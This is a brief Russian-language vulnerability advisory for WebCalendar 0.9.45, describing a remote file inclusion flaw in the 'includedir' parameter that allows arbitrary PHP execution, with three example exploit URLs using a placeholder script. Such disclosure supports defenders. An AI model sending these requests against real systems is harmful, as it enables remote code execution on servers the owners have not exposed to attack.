Программа: WebCalendar 0.9.45

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «includedir» различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://localhost/[calendar]/ws/login.php?includedir=[evilscript]
http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript]
http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript]



Оставить мнение